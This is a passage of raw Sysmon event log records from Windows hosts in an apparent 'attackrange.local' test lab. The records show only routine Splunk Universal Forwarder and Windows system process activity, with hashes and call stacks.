Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806658Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.598{0C1E0330-F38D-60EB-5279-00000000D001}2688C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806657Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.300{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20B9C421365317242B8F54C677C3C8D3,SHA256=4EFCA8179D1152E166FDA6C87E6BC58FBBC3A08CAAAC09863DB0684E32D67B17,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806656Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.237{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=614C44CE2B69CE95EECC79F1571E4C21,SHA256=6FF453CAF1C579F6E5C0D0F03B716D22EF9733193D52F117CBA29431B6B8025D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806655Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:25.237{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9152998C636D4F6CE5F156BE1EE6AFD0,SHA256=7A88081DB62DFF3F0ADCDC6C60ABC5385D38E1140AF72BDACF7B51D8B61E39A7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001046987Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:47:26.969{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C98F1F3858319E367303577E6BAAA10F,SHA256=710CE96A3909DCB8360A4E4FA07E11320E704DC33D281C23990032F4754E4A96,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806700Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.972{0C1E0330-F38E-60EB-5479-00000000D001}40483920C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806699Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F38E-60EB-5479-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806698Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806697Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806696Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806695Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806694Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806693Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806692Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806691Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806690Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806689Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-048F-60E8-0500-00000000D001}412996C:\Windows\system32\csrss.exe{0C1E0330-F38E-60EB-5479-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000806688Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.831{0C1E0330-050B-60E8-9B00-00000000D001}10203368C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{0C1E0330-F38E-60EB-5479-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000806687Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.817{0C1E0330-F38E-60EB-5479-00000000D001}4048C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{0C1E0330-048F-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{0C1E0330-050B-60E8-9B00-00000000D001}1020C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000806686Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.612{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=614C44CE2B69CE95EECC79F1571E4C21,SHA256=6FF453CAF1C579F6E5C0D0F03B716D22EF9733193D52F117CBA29431B6B8025D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000806685Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F5298DAA0A6D72EA0DE4643091A077C,SHA256=E15F73B0CB796546A71B89FC0B283617F58142093E995E4E04EE467A2D9DD773,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000806684Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-050B-60E8-A000-00000000D001}35321936C:\Windows\system32\conhost.exe{0C1E0330-F38E-60EB-5379-00000000D001}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806683Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806682Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806681Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806680Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806679Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806678Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000806677Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:47:26.300{0C1E0330-048F-60E8-0C00-00000000D001}724636C:\Windows\system32\svchost.exe{0C1E0330-0490-60E8-1F00-00000000D001}2012C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 